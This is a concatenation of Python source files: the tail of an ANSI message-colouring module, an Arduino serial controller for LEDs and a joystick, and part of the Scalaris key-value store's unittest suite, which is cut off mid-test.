return msgcolored, m
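# --- Illustrative usage sketch (not part of the original module) -------------
# Renders one MsgMap entry with the ANSI maps above and splits the escape-coded
# result back into (color, extras, text) groups via unshell_message(), which
# yields one "tagNN" entry per colored run.
if __name__ == '__main__':
    rendered = MsgMap[6]['text'].format(**ColorExtraMap)
    groups, next_tag = unshell_message(rendered, 0)
    # e.g. {'tag00': {'color': 'green', 'extra': ['bold'],
    #                 'text': 'RPC Bind acknowledged !!!\n\n'}}
    for tag, info in groups.items():
        print(tag, info['color'], info['extra'], repr(info['text']))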
|
arduinoController.py
|
import serial
import serial.tools.list_ports
import time
import threading
import re
import os
import logger
cf_logger = logger.get_logger(__name__)
TIME_BETWEEN_MESSAGES = 0.01
LED_MESSAGE_PREFIX = 17
RESET_MESSAGE_BYTE = 89
CALIBRATION_SAMPLES = 10
arduino_message_format = r'^(\d{1,3}) (\d{1,3}) ([01])$'
arduino_message_regex = re.compile(arduino_message_format)
def _get_port():
if os.name == 'nt': # if run on windows
ports = [str(port) for port in serial.tools.list_ports.comports()]
cf_logger.debug("serial ports found:")
cf_logger.debug(ports)
assert len(ports) > 0, 'no serial port found'
return ports[-1].split('-')[0].strip()
else: # linux support
return '/dev/ttyUSB0'
class ArduinoController:
def __init__(self):
self._serial_port = _get_port()
cf_logger.info('serial port name is %s' % self._serial_port)
self.ser = serial.Serial(self._serial_port, 9600)
cf_logger.info('connected')
self._data = None
self._run_thread = True
self._thread = threading.Thread(target=self._read_joystick)
self._valuesMutex = threading.Lock()
self._serMutex = threading.Lock()
self._thread.start()
self.reset_leds()
self._set_defaults()
cf_logger.info('Arduino board ready to use')
def disconnect(self):
cf_logger.info('disconnection')
self._run_thread = False
time.sleep(0.2)
cf_logger.info('close serial port')
self.ser.close()
# Set the color of the given LED by specifying its RGB values
def set_led(self, led, r, g, b):
cf_logger.info('%d - (%d %d %d)' % (led, r, g, b))
checksum = (LED_MESSAGE_PREFIX + led + r + g + b) % 256
values = bytearray([LED_MESSAGE_PREFIX, led, r, g, b, checksum])
self._serMutex.acquire()
self.ser.write(values)
self._serMutex.release()
def reset_leds(self):
self._serMutex.acquire()
self.ser.write(bytearray([RESET_MESSAGE_BYTE]))
self._serMutex.release()
def get_button(self):
self._valuesMutex.acquire()
data = self._data
self._valuesMutex.release()
return data.split()[2] == '0'
def get_joystick_direction(self):
ax, ay = self._get_joystick_position()
if abs(ax - self._default_x) < 20 and abs(ay - self._default_y) < 20:
return [0, 0]
ax = -(ax - self._default_x)
ay = -(ay - self._default_y)
return [ax, ay]
def _set_defaults(self):
start = time.time()
while True:
if self._data:
break
if time.time() - start > 5:
raise Exception('time out waiting for arduino data')
time.sleep(0.1)
time.sleep(0.1)
axs = []
ays = []
for _ in range(CALIBRATION_SAMPLES):
ax, ay = self._get_joystick_position()
axs.append(ax)
ays.append(ay)
time.sleep(0.05)
self._default_x = max(set(axs), key=axs.count)
self._default_y = max(set(ays), key=ays.count)
assert axs.count(self._default_x) > 0.7 * CALIBRATION_SAMPLES, 'default samples are not stable enough - ax'
assert ays.count(self._default_y) > 0.7 * CALIBRATION_SAMPLES, 'default samples are not stable enough - ay'
# Get the joystick position as a pair of x and y values.
def _get_joystick_position(self):
self._valuesMutex.acquire()
data = self._data
self._valuesMutex.release()
values = [int(x) for x in data.split()]
return values[1], values[0]
def _read_joystick(self):
while self._run_thread:
self._serMutex.acquire()
if self.ser.inWaiting() == 0:
self._serMutex.release()
time.sleep(TIME_BETWEEN_MESSAGES / 2)
continue
line = self.ser.readline()
self._serMutex.release()
try:
line = line.decode('UTF-8').rstrip("\r\n")
except UnicodeDecodeError:
cf_logger.warning('decoding line failed %s' % line)
continue
if arduino_message_regex.match(line):
self._valuesMutex.acquire()
self._data = line
self._valuesMutex.release()
else:
cf_logger.warning('wrong line format - %s'%line)
time.sleep(TIME_BETWEEN_MESSAGES / 2)
cf_logger.info('read joystick thread ended')
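# --- Illustrative usage sketch (not part of the original module) -------------
# Assumes an Arduino running the matching firmware is attached to the serial port
# that _get_port() discovers; without the hardware the constructor will raise.
if __name__ == '__main__':
    controller = ArduinoController()
    try:
        controller.set_led(0, 0, 128, 0)            # LED 0 to dim green
        for _ in range(50):                         # poll for roughly 5 seconds
            direction = controller.get_joystick_direction()
            pressed = controller.get_button()
            cf_logger.info('joystick=%s button=%s' % (direction, pressed))
            time.sleep(0.1)
        controller.reset_leds()
    finally:
        controller.disconnect()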
|
scalaris_test.py
|
# Copyright 2011-2015 Zuse Institute Berlin
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from scalaris import TransactionSingleOp, Transaction, PubSub, ReplicatedDHT, ScalarisVM,\
JSONConnection
import scalaris
import time, threading, json, socket
from datetime import datetime
from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler
from random import shuffle
import unittest
# wait that long for subscription notifications to arrive
_NOTIFICATIONS_TIMEOUT = 60
_TEST_DATA = [
"ahz2ieSh", "wooPhu8u", "quai9ooK", "Oquae4ee", "Airier1a", "Boh3ohv5", "ahD3Saog", "EM5ooc4i",
"Epahrai8", "laVahta7", "phoo6Ahj", "Igh9eepa", "aCh4Lah6", "ooT0ath5", "uuzau4Ie", "Iup6mae6",
# "xie7iSie", "ail8yeeP", "ooZ4eesi", "Ahn7ohph", "Ohy5moo6", "xooSh9Oo", "ieb6eeS7", "Thooqu9h",
# "eideeC9u", "phois3Ie", "EimaiJ2p", "sha6ahR1", "Pheih3za", "bai4eeXe", "rai0aB7j", "xahXoox6",
# "Xah4Okeg", "cieG8Yae", "Pe9Ohwoo", "Eehig6ph", "Xe7rooy6", "waY2iifu", "kemi8AhY", "Che7ain8",
# "ohw6seiY", "aegh1oBa", "thoh9IeG", "Kee0xuwu", "Gohng8ee", "thoh9Chi", "aa4ahQuu", "Iesh5uge",
# "Ahzeil8n", "ieyep5Oh", "xah3IXee", "Eefa5qui", "kai8Muuf", "seeCe0mu", "cooqua5Y", "Ci3ahF6z",
# "ot0xaiNu", "aewael8K", "aev3feeM", "Fei7ua5t", "aeCa6oph", "ag2Aelei", "Shah1Pho", "ePhieb0N",
# "Uqu7Phup", "ahBi8voh", "oon3aeQu", "Koopa0nu", "xi0quohT", "Oog4aiph", "Aip2ag5D", "tirai7Ae",
# "gi0yoePh", "uay7yeeX", "aeb6ahC1", "OoJeic2a", "ieViom1y", "di0eeLai", "Taec2phe", "ID2cheiD",
# "oi6ahR5M", "quaiGi8W", "ne1ohLuJ", "DeD0eeng", "yah8Ahng", "ohCee2ie", "ecu1aDai", "oJeijah4",
# "Goo9Una1", "Aiph3Phi", "Ieph0ce5", "ooL6cae7", "nai0io1H", "Oop2ahn8", "ifaxae7O", "NeHai1ae",
# "Ao8ooj6a", "hi9EiPhi", "aeTh9eiP", "ao8cheiH", "Yieg3sha", "mah7cu2D", "Uo5wiegi", "Oowei0ya",
# "efeiDee7", "Oliese6y", "eiSh1hoh", "Joh6hoh9", "zib6Ooqu", "eejiJie4", "lahZ3aeg", "keiRai1d",
# "Fei0aewe", "aeS8aboh", "hae3ohKe", "Een9ohQu", "AiYeeh7o", "Yaihah4s", "ood4Giez", "Oumai7te",
# "hae2kahY", "afieGh4v", "Ush0boo0", "Ekootee5", "Ya8iz6Ie", "Poh6dich", "Eirae4Ah", "pai8Eeme",
# "uNah7dae", "yo3hahCh", "teiTh7yo", "zoMa5Cuv", "ThiQu5ax", "eChi5caa", "ii9ujoiV", "ge7Iekui",
"sai2aiTa", "ohKi9rie", "ei2ioChu", "aaNgah9y", "ooJai1Ie", "shoh0oH9", "Ool4Ahya", "poh0IeYa",
"Uquoo0Il", "eiGh4Oop", "ooMa0ufe", "zee6Zooc", "ohhao4Ah", "Uweekek5", "aePoos9I", "eiJ9noor",
"phoong1E", "ianieL2h", "An7ohs4T", "Eiwoeku3", "sheiS3ao", "nei5Thiw", "uL5iewai", "ohFoh9Ae"]
_TOO_LARGE_REQUEST_SIZE = 1024*1024*10 # number of bytes
class TestTransactionSingleOp(unittest.TestCase):
def setUp(self):
# The time when the test suite was started.
now = datetime.now()
# This is used to create different erlang keys for each run.
self._testTime = int(time.mktime(now.timetuple()) * 1000 + (now.microsecond / 1000.0))
# Test method for TransactionSingleOp()
def testTransactionSingleOp1(self):
conn = TransactionSingleOp()
conn.close_connection()
# Test method for TransactionSingleOp(conn)
def testTransactionSingleOp2(self):
conn = TransactionSingleOp(conn = scalaris.JSONConnection(url = scalaris.DEFAULT_URL))
conn.close_connection()
# Test method for TransactionSingleOp.close_connection() trying to close the connection twice.
def testDoubleClose(self):
conn = TransactionSingleOp()
conn.close_connection()
conn.close_connection()
# Test method for TransactionSingleOp.read(key)
def testRead_NotFound(self):
key = "_Read_NotFound"
conn = TransactionSingleOp()
self.assertRaises(scalaris.NotFoundError, conn.read, str(self._testTime) + key)
conn.close_connection()
# Test method for TransactionSingleOp.read(key) with a closed connection.
def testRead_NotConnected(self):
key = "_Read_NotConnected"
conn = TransactionSingleOp()
conn.close_connection()
#self.assertRaises(scalaris.ConnectionError, conn.read, str(self._testTime) + key)
self.assertRaises(scalaris.NotFoundError, conn.read, str(self._testTime) + key)
conn.close_connection()
# Test method for TransactionSingleOp.write(key, value=str()) with a closed connection.
def testWriteString_NotConnected(self):
key = "_WriteString_NotConnected"
conn = TransactionSingleOp()
conn.close_connection()
#self.assertRaises(scalaris.ConnectionError, conn.write, str(self._testTime) + key, _TEST_DATA[0])
conn.write(str(self._testTime) + key, _TEST_DATA[0])
conn.close_connection()
# Test method for TransactionSingleOp.write(key, value=str()) and TransactionSingleOp.read(key).
# Writes strings and uses a distinct key for each value. Tries to read the data afterwards.
def testWriteString1(self):
key = "_WriteString1_"
conn = TransactionSingleOp()
for i in xrange(len(_TEST_DATA)):
conn.write(str(self._testTime) + key + str(i), _TEST_DATA[i])
# now try to read the data:
for i in xrange(len(_TEST_DATA)):
actual = conn.read(str(self._testTime) + key + str(i))
self.assertEqual(actual, _TEST_DATA[i])
conn.close_connection()
# Test method for TransactionSingleOp.write(key, value=str()) and TransactionSingleOp.read(key).
# Writes strings and uses a single key for all the values. Tries to read the data afterwards.
def testWriteString2(self):
key = "_WriteString2"
conn = TransactionSingleOp()
for i in xrange(len(_TEST_DATA)):
conn.write(str(self._testTime) + key, _TEST_DATA[i])
# now try to read the data:
actual = conn.read(str(self._testTime) + key)
self.assertEqual(actual, _TEST_DATA[len(_TEST_DATA) - 1])
conn.close_connection()
# Test method for TransactionSingleOp.write(key, value=list()) with a closed connection.
def testWriteList_NotConnected(self):
key = "_WriteList_NotConnected"
conn = TransactionSingleOp()
conn.close_connection()
#self.assertRaises(scalaris.ConnectionError, conn.write, str(self._testTime) + key, [_TEST_DATA[0], _TEST_DATA[1]])
conn.write(str(self._testTime) + key, [_TEST_DATA[0], _TEST_DATA[1]])
conn.close_connection()
# Test method for TransactionSingleOp.write(key, value=list()) and TransactionSingleOp.read(key).
# Writes lists and uses a distinct key for each value. Tries to read the data afterwards.
def testWriteList1(self):
key = "_WriteList1_"
conn = TransactionSingleOp()
for i in xrange(0, len(_TEST_DATA) - 1, 2):
conn.write(str(self._testTime) + key + str(i), [_TEST_DATA[i], _TEST_DATA[i + 1]])
# now try to read the data:
for i in xrange(0, len(_TEST_DATA), 2):
actual = conn.read(str(self._testTime) + key + str(i))
self.assertEqual(actual, [_TEST_DATA[i], _TEST_DATA[i + 1]])
conn.close_connection()
# Test method for TransactionSingleOp.write(key, value=list()) and TransactionSingleOp.read(key).
# Writes lists and uses a single key for all the values. Tries to read the data afterwards.
def testWriteList2(self):
key = "_WriteList2"
conn = TransactionSingleOp()
mylist = []
for i in xrange(0, len(_TEST_DATA) - 1, 2):
mylist = [_TEST_DATA[i], _TEST_DATA[i + 1]]
conn.write(str(self._testTime) + key, mylist)
# now try to read the data:
actual = conn.read(str(self._testTime) + key)
self.assertEqual(actual, mylist)
conn.close_connection()
# Test method for TransactionSingleOp.test_and_set(key, oldvalue=str(), newvalue=str()) with a closed connection.
def testTestAndSetString_NotConnected(self):
key = "_TestAndSetString_NotConnected"
conn = TransactionSingleOp()
conn.close_connection()
#self.assertRaises(scalaris.ConnectionError, conn.test_and_set, str(self._testTime) + key, _TEST_DATA[0], _TEST_DATA[1])
self.assertRaises(scalaris.NotFoundError, conn.test_and_set, str(self._testTime) + key, _TEST_DATA[0], _TEST_DATA[1])
conn.close_connection()
# Test method for TransactionSingleOp.test_and_set(key, oldvalue=str(), newvalue=str()).
# Tries test_and_set with a non-existing key.
def testTestAndSetString_NotFound(self):
key = "_TestAndSetString_NotFound"
conn = TransactionSingleOp()
self.assertRaises(scalaris.NotFoundError, conn.test_and_set, str(self._testTime) + key, _TEST_DATA[0], _TEST_DATA[1])
conn.close_connection()
# Test method for TransactionSingleOp.test_and_set(key, oldvalue=str(), newvalue=str()),
# TransactionSingleOp.read(key) and TransactionSingleOp.write(key, value=str()).
# Writes a string and tries to overwrite it using test_and_set
# knowing the correct old value. Tries to read the string afterwards.
def testTestAndSetString1(self):
key = "_TestAndSetString1"
conn = TransactionSingleOp()
# first write all values:
for i in xrange(0, len(_TEST_DATA) - 1, 2):
conn.write(str(self._testTime) + key + str(i), _TEST_DATA[i])
# now try to overwrite them using test_and_set:
for i in xrange(0, len(_TEST_DATA) - 1, 2):
conn.test_and_set(str(self._testTime) + key + str(i), _TEST_DATA[i], _TEST_DATA[i + 1])
# now try to read the data:
for i in xrange(0, len(_TEST_DATA), 2):
actual = conn.read(str(self._testTime) + key + str(i))
self.assertEqual(actual, _TEST_DATA[i + 1])
conn.close_connection()
# Test method for TransactionSingleOp.test_and_set(key, oldvalue=str(), newvalue=str()),
# TransactionSingleOp.read(key) and TransactionSingleOp.write(key, value=str()).
# Writes a string and tries to overwrite it using test_and_set
# knowing the wrong old value. Tries to read the string afterwards.
def testTestAndSetString2(self):
key = "_TestAndSetString2"
conn = TransactionSingleOp()
# first write all values:
for i in xrange(0, len(_TEST_DATA) - 1, 2):
conn.write(str(self._testTime) + key + str(i), _TEST_DATA[i])
# now try to overwrite them using test_and_set:
for i in xrange(0, len(_TEST_DATA) - 1, 2):
try:
conn.test_and_set(str(self._testTime) + key + str(i), _TEST_DATA[i + 1], "fail")
self.fail('expected a KeyChangedError')
except scalaris.KeyChangedError as exception:
self.assertEqual(exception.old_value, _TEST_DATA[i])
# now try to read the data:
for i in xrange(0, len(_TEST_DATA), 2):
actual = conn.read(str(self._testTime) + key + str(i))
self.assertEqual(actual, _TEST_DATA[i])
conn.close_connection()
# Test method for TransactionSingleOp.test_and_set(key, oldvalue=str(), newvalue=list()) with a closed connection.
def testTestAndSetList_NotConnected(self):
key = "_TestAndSetList_NotConnected"
conn = TransactionSingleOp()
conn.close_connection()
#self.assertRaises(scalaris.ConnectionError, conn.test_and_set, str(self._testTime) + key, "fail", [_TEST_DATA[0], _TEST_DATA[1]])
self.assertRaises(scalaris.NotFoundError, conn.test_and_set, str(self._testTime) + key, "fail", [_TEST_DATA[0], _TEST_DATA[1]])
conn.close_connection()
# Test method for TransactionSingleOp.test_and_set(key, oldvalue=str(), newvalue=list()).
# Tries test_and_set with a non-existing key.
def testTestAndSetList_NotFound(self):
key = "_TestAndSetList_NotFound"
conn = TransactionSingleOp()
self.assertRaises(scalaris.NotFoundError, conn.test_and_set, str(self._testTime) + key, "fail", [_TEST_DATA[0], _TEST_DATA[1]])
conn.close_connection()
# Test method for TransactionSingleOp.test_and_set(key, oldvalue=str(), newvalue=list()),
# TransactionSingleOp.read(key) and TransactionSingleOp.write(key, value=list()).
# Writes a list and tries to overwrite it using test_and_set
# knowing the correct old value. Tries to read the list afterwards.
def testTestAndSetList1(self):
key = "_TestAndSetList1"
conn = TransactionSingleOp()
# first write all values:
for i in xrange(0, len(_TEST_DATA) - 1, 2):
conn.write(str(self._testTime) + key + str(i), [_TEST_DATA[i], _TEST_DATA[i + 1]])
# now try to overwrite them using test_and_set:
for i in xrange(0, len(_TEST_DATA) - 1, 2):
conn.test_and_set(str(self._testTime) + key + str(i), [_TEST_DATA[i], _TEST_DATA[i + 1]], [_TEST_DATA[i + 1], _TEST_DATA[i]])
# now try to read the data:
for i in xrange(0, len(_TEST_DATA) - 1, 2):
actual = conn.read(str(self._testTime) + key + str(i))
self.assertEqual(actual, [_TEST_DATA[i + 1], _TEST_DATA[i]])
conn.close_connection()
# Test method for TransactionSingleOp.test_and_set(key, oldvalue=str(), newvalue=list()),
# TransactionSingleOp.read(key) and TransactionSingleOp.write(key, value=list()).
# Writes a list and tries to overwrite it using test_and_set
# knowing the wrong old value. Tries to read the list afterwards.
def testTestAndSetList2(self):
key = "_TestAndSetList2"
conn = TransactionSingleOp()
# first write all values:
for i in xrange(0, len(_TEST_DATA) - 1, 2):
conn.write(str(self._testTime) + key + str(i), [_TEST_DATA[i], _TEST_DATA[i + 1]])
# now try to overwrite them using test_and_set:
for i in xrange(0, len(_TEST_DATA) - 1, 2):
try:
conn.test_and_set(str(self._testTime) + key + str(i), "fail", 1)
self.fail('expected a KeyChangedError')
except scalaris.KeyChangedError as exception:
self.assertEqual(exception.old_value, [_TEST_DATA[i], _TEST_DATA[i + 1]])
# now try to read the data:
for i in xrange(0, len(_TEST_DATA) - 1, 2):
actual = conn.read(str(self._testTime) + key + str(i))
self.assertEqual(actual, [_TEST_DATA[i], _TEST_DATA[i + 1]])
conn.close_connection()
# Test method for TransactionSingleOp.req_list(RequestList) with an
# empty request list.
def testReqList_Empty(self):
conn = TransactionSingleOp()
conn.req_list(conn.new_req_list())
conn.close_connection()
# Test method for TransactionSingleOp.req_list(RequestList) with a
# mixed request list.
def testReqList1(self):
key = "_ReqList1_"
conn = TransactionSingleOp()
readRequests = conn.new_req_list()
firstWriteRequests = conn.new_req_list()
writeRequests = conn.new_req_list()
for i in xrange(0, len(_TEST_DATA)):
if (i % 2) == 0:
firstWriteRequests.add_write(str(self._testTime) + key + str(i), "first_" + _TEST_DATA[i])
writeRequests.add_write(str(self._testTime) + key + str(i), "second_" + _TEST_DATA[i])
readRequests.add_read(str(self._testTime) + key + str(i))
results = conn.req_list(firstWriteRequests)
# evaluate the first write results:
for i in xrange(0, firstWriteRequests.size()):
conn.process_result_write(results[i])
results = conn.req_list(readRequests)
self.assertEqual(readRequests.size(), len(results))
# now evaluate the read results:
for i in xrange(0, readRequests.size()):
if (i % 2) == 0:
actual = conn.process_result_read(results[i])
self.assertEqual("first_" + _TEST_DATA[i], actual)
else:
try:
result = conn.process_result_read(results[i])
# a not found exception must be thrown
self.fail('expected a NotFoundError, got: ' + str(result))
except scalaris.NotFoundError:
pass
results = conn.req_list(writeRequests)
self.assertEqual(writeRequests.size(), len(results))
# now evaluate the write results:
for i in xrange(0, writeRequests.size()):
conn.process_result_write(results[i])
# once again test reads - now all reads should be successful
results = conn.req_list(readRequests)
self.assertEqual(readRequests.size(), len(results))
# now evaluate the read results:
for i in xrange(0, readRequests.size()):
actual = conn.process_result_read(results[i])
self.assertEqual("second_" + _TEST_DATA[i], actual)
conn.close_connection()
# Test method for TransactionSingleOp.write(key, value=bytearray()) with a
# request that is too large.
def testReqTooLarge(self):
conn = TransactionSingleOp()
data = ''.join('0' for _x in xrange(_TOO_LARGE_REQUEST_SIZE))
key = "_ReqTooLarge"
try:
conn.write(str(self._testTime) + key, data)
self.fail('The write should have failed unless yaws_max_post_data was set larger than ' + str(_TOO_LARGE_REQUEST_SIZE))
except scalaris.ConnectionError:
pass
conn.close_connection()
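# --- Illustrative sketch (not part of the original test suite) ---------------
# A minimal, standalone version of the write/read round-trip exercised by the
# tests above, assuming a Scalaris node is reachable at scalaris.DEFAULT_URL.
# It is defined here for reference only and is not called by any test.
def _example_single_op_roundtrip(key, value):
    conn = TransactionSingleOp()
    try:
        conn.write(key, value)       # a single-op write commits immediately
        return conn.read(key)        # returns the value that was just written
    finally:
        conn.close_connection()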
class TestTransaction(unittest.TestCase):
def setUp(self):
# The time when the test suite was started.
now = datetime.now()
# This is used to create different erlang keys for each run.
self._testTime = int(time.mktime(now.timetuple()) * 1000 + (now.microsecond / 1000.0))
# Test method for Transaction()
def testTransaction1(self):
t = Transaction()
t.close_connection()
# Test method for Transaction(conn)
def testTransaction3(self):
t = Transaction(conn = scalaris.JSONConnection(url = scalaris.DEFAULT_URL))
t.close_connection()
# Test method for Transaction.close_connection() trying to close the connection twice.
def testDoubleClose(self):
t = Transaction()
t.close_connection()
t.close_connection()
# Test method for Transaction.commit() with a closed connection.
def testCommit_NotConnected(self):
t = Transaction()
t.close_connection()
#self.assertRaises(scalaris.ConnectionError, t.commit)
t.commit()
t.close_connection()
# Test method for Transaction.commit() which commits an empty transaction.
def testCommit_Empty(self):
t = Transaction()
t.commit()
t.close_connection()
# Test method for Transaction.abort() with a closed connection.
def testAbort_NotConnected(self):
t = Transaction()
t.close_connection()
#self.assertRaises(scalaris.ConnectionError, t.abort)
t.abort()
t.close_connection()
# Test method for Transaction.abort() which aborts an empty transaction.
def testAbort_Empty(self):
t = Transaction()
t.abort()
t.close_connection()
# Test method for Transaction.read(key)
def testRead_NotFound(self):
key = "_Read_NotFound"
t = Transaction()
self.assertRaises(scalaris.NotFoundError, t.read, str(self._testTime) + key)
t.close_connection()
# Test method for Transaction.read(key) with a closed connection.
def testRead_NotConnected(self):
key = "_Read_NotConnected"
t = Transaction()
t.close_connection()
#self.assertRaises(scalaris.ConnectionError, t.read, str(self._testTime) + key)
self.assertRaises(scalaris.NotFoundError, t.read, str(self._testTime) + key)
t.close_connection()
# Test method for Transaction.write(key, value=str()) with a closed connection.
def testWriteString_NotConnected(self):
key = "_WriteString_NotConnected"
t = Transaction()
t.close_connection()
#self.assertRaises(scalaris.ConnectionError, t.write, str(self._testTime) + key, _TEST_DATA[0])
t.write(str(self._testTime) + key, _TEST_DATA[0])
t.close_connection()
# Test method for Transaction.read(key) and Transaction.write(key, value=str())
# which should show that writing a value for a key for which a previous read
# returned a NotFoundError is possible.
def testWriteString_NotFound(self):
key = "_WriteString_notFound"
t = Transaction()
notFound = False
try:
t.read(str(self._testTime) + key)
except scalaris.NotFoundError:
notFound = True
self.assertTrue(notFound)
t.write(str(self._testTime) + key, _TEST_DATA[0])
self.assertEqual(t.read(str(self._testTime) + key), _TEST_DATA[0])
t.close_connection()
# Test method for Transaction.write(key, value=str()) and Transaction.read(key).
# Writes strings and uses a distinct key for each value. Tries to read the data afterwards.
def testWriteString(self):
key = "_testWriteString1_"
t = Transaction()
for i in xrange(len(_TEST_DATA)):
t.write(str(self._testTime) + key + str(i), _TEST_DATA[i])
# now try to read the data:
for i in xrange(len(_TEST_DATA)):
actual = t.read(str(self._testTime) + key + str(i))
self.assertEqual(actual, _TEST_DATA[i])
# commit the transaction and try to read the data with a new one:
t.commit()
t = Transaction()
for i in xrange(len(_TEST_DATA)):
actual = t.read(str(self._testTime) + key + str(i))
self.assertEqual(actual, _TEST_DATA[i])
t.close_connection()
# Test method for Transaction.write(key, value=list()) and Transaction.read(key).
# Writes a list and uses a distinct key for each value. Tries to read the data afterwards.
def testWriteList1(self):
key = "_testWriteList1_"
t = scalaris.Transaction()
for i in xrange(0, len(_TEST_DATA) - 1, 2):
t.write(str(self._testTime) + key + str(i), [_TEST_DATA[i], _TEST_DATA[i + 1]])
# now try to read the data:
for i in xrange(0, len(_TEST_DATA), 2):
actual = t.read(str(self._testTime) + key + str(i))
self.assertEqual(actual, [_TEST_DATA[i], _TEST_DATA[i + 1]])
t.close_connection()
# commit the transaction and try to read the data with a new one:
t.commit()
t = Transaction()
for i in xrange(0, len(_TEST_DATA), 2):
actual = t.read(str(self._testTime) + key + str(i))
self.assertEqual(actual, [_TEST_DATA[i], _TEST_DATA[i + 1]])
t.close_connection()
# Test method for Transaction.req_list(RequestList) with an
# empty request list.
def testReqList_Empty(self):
conn = Transaction()
conn.req_list(conn.new_req_list())
conn.close_connection()
# Test method for Transaction.req_list(RequestList) with a
# mixed request list.
def testReqList1(self):
key = "_ReqList1_"
conn = Transaction()
readRequests = conn.new_req_list()
firstWriteRequests = conn.new_req_list()
writeRequests = conn.new_req_list()
for i in xrange(0, len(_TEST_DATA)):
if (i % 2) == 0:
firstWriteRequests.add_write(str(self._testTime) + key + str(i), _TEST_DATA[i])
writeRequests.add_write(str(self._testTime) + key + str(i), _TEST_DATA[i])
readRequests.add_read(str(self._testTime) + key + str(i))
results = conn.req_list(firstWriteRequests)
# evaluate the first write results:
for i in xrange(0, firstWriteRequests.size()):
conn.process_result_write(results[i])
requests = conn.new_req_list(readRequests).extend(writeRequests).add_commit()
results = conn.req_list(requests)
self.assertEqual(requests.size(), len(results))
# now evaluate the read results:
for i in xrange(0, readRequests.size()):
if (i % 2) == 0:
actual = conn.process_result_read(results[i])
self.assertEqual(_TEST_DATA[i], actual)
else:
try:
conn.process_result_read(results[i])
# a not found exception must be thrown
self.fail('expected a NotFoundError')
except scalaris.NotFoundError:
pass
# now evaluate the write results:
for i in xrange(0, writeRequests.size()):
pos = readRequests.size() + i
conn.process_result_write(results[pos])
# once again test reads - now all reads should be successful
results = conn.req_list(readRequests)
self.assertEqual(readRequests.size(), len(results))
# now evaluate the read results:
for i in xrange(0, readRequests.size()):
actual = conn.process_result_read(results[i])
self.assertEqual(_TEST_DATA[i], actual)
conn.close_connection()
# Test method for Transaction.write(key, value=bytearray()) with a
# request that is too large.
def testReqTooLarge(self):
conn = Transaction()
data = ''.join('0' for _x in xrange(_TOO_LARGE_REQUEST_SIZE))
key = "_ReqTooLarge"
try:
conn.write(str(self._testTime) + key, data)
self.fail('The write should have failed unless yaws_max_post_data was set larger than ' + str(_TOO_LARGE_REQUEST_SIZE))
except scalaris.ConnectionError:
pass
conn.close_connection()
# Various tests.
def testVarious(self):
self._writeSingleTest("_0:\u0160arplaninac:page_", _TEST_DATA[0])
# Helper function for single write tests.
# Writes a string to some key and tries to read it afterwards.
def _writeSingleTest(self, key, data):
t = Transaction()
t.write(str(self._testTime) + key, data)
# now try to read the data:
self.assertEqual(t.read(str(self._testTime) + key), data)
# commit the transaction and try to read the data with a new one:
t.commit()
t = Transaction()
self.assertEqual(t.read(str(self._testTime) + key), data)
t.close_connection()
class TestPubSub(unittest.TestCase):
def setUp(self):
# The time when the test suite was started.
now = datetime.now()
# This is used to create different erlang keys for each run.
self._testTime = int(time.mktime(now.timetuple()) * 1000 + (now.microsecond / 1000.0))
# checks whether mylist contains more elements than expectedElements and returns one of the surplus elements (or None)
@staticmethod
def _getDiffElement(mylist, expectedElements):
for e in expectedElements:
mylist.remove(e)
if len(mylist) > 0:
return mylist[0]
else:
return None
# Test method for PubSub()
def testPubSub1(self):
conn = PubSub()
conn.close_connection()
# Test method for PubSub(conn)
def testPubSub2(self):
conn = PubSub(conn = scalaris.JSONConnection(url = scalaris.DEFAULT_URL))
conn.close_connection()
# Test method for PubSub.close_connection() trying to close the connection twice.
def testDoubleClose(self):
conn = PubSub()
conn.close_connection()
conn.close_connection()
# Test method for PubSub.publish(topic, content) with a closed connection.
def testPublish_NotConnected(self):
topic = "_Publish_NotConnected"
conn = PubSub()
conn.close_connection()
#self.assertRaises(scalaris.ConnectionError, conn.publish, str(self._testTime) + topic, _TEST_DATA[0])
conn.publish(str(self._testTime) + topic, _TEST_DATA[0])
conn.close_connection()
# Test method for PubSub.publish(topic, content).
# Publishes some topics and uses a distinct key for each value.
def testPublish1(self):
topic = "_Publish1_"
conn = PubSub()
for i in xrange(len(_TEST_DATA)):
conn.publish(str(self._testTime) + topic + str(i), _TEST_DATA[i])
conn.close_connection()
# Test method for PubSub.publish(topic, content).
# Publishes some topics and uses a single key for all the values.
def testPublish2(self):
topic = "_Publish2"
conn = PubSub()
for i in xrange(len(_TEST_DATA)):
conn.publish(str(self._testTime) + topic, _TEST_DATA[i])
conn.close_connection()
# Test method for PubSub.get_subscribers(topic) with a closed connection.
def testGetSubscribersOtp_NotConnected(self):
topic = "_GetSubscribers_NotConnected"
conn = PubSub()
conn.close_connection()
#self.assertRaises(scalaris.ConnectionError, conn.get_subscribers, str(self._testTime) + topic)
conn.get_subscribers(str(self._testTime) + topic)
conn.close_connection()
# Test method for PubSub.get_subscribers(topic).
# Tries to get a subscriber list from an empty topic.
def testGetSubscribers_NotExistingTopic(self):
topic = "_GetSubscribers_NotExistingTopic"
conn = PubSub()
subscribers = conn.get_subscribers(str(self._testTime) + topic)
self.assertEqual(subscribers, [])
conn.close_connection()
# Test method for PubSub.subscribe(topic, url) with a closed connection.
def testSubscribe_NotConnected(self):
topic = "_Subscribe_NotConnected"
conn = PubSub()
conn.close_connection()
#self.assertRaises(scalaris.ConnectionError, conn.subscribe, str(self._testTime) + topic, _TEST_DATA[0])
conn.subscribe(str(self._testTime) + topic, _TEST_DATA[0])
conn.close_connection()
# Test method for PubSub.subscribe(topic, url) and PubSub.get_subscribers(topic).
# Subscribes some arbitrary URLs to arbitrary topics and uses a distinct topic for each URL.
def testSubscribe1(self):
topic = "_Subscribe1_"
conn = PubSub()
for i in xrange(len(_TEST_DATA)):
conn.subscribe(str(self._testTime) + topic + str(i), _TEST_DATA[i])
# check if the subscribers were successfully saved:
for i in xrange(len(_TEST_DATA)):
topic1 = topic + str(i)
subscribers = conn.get_subscribers(str(self._testTime) + topic1)
self.assertTrue(_TEST_DATA[i] in subscribers,
msg = "Subscriber \"" + _TEST_DATA[i] + "\" does not exist for topic \"" + topic1 + "\"")
self.assertEqual(len(subscribers), 1,
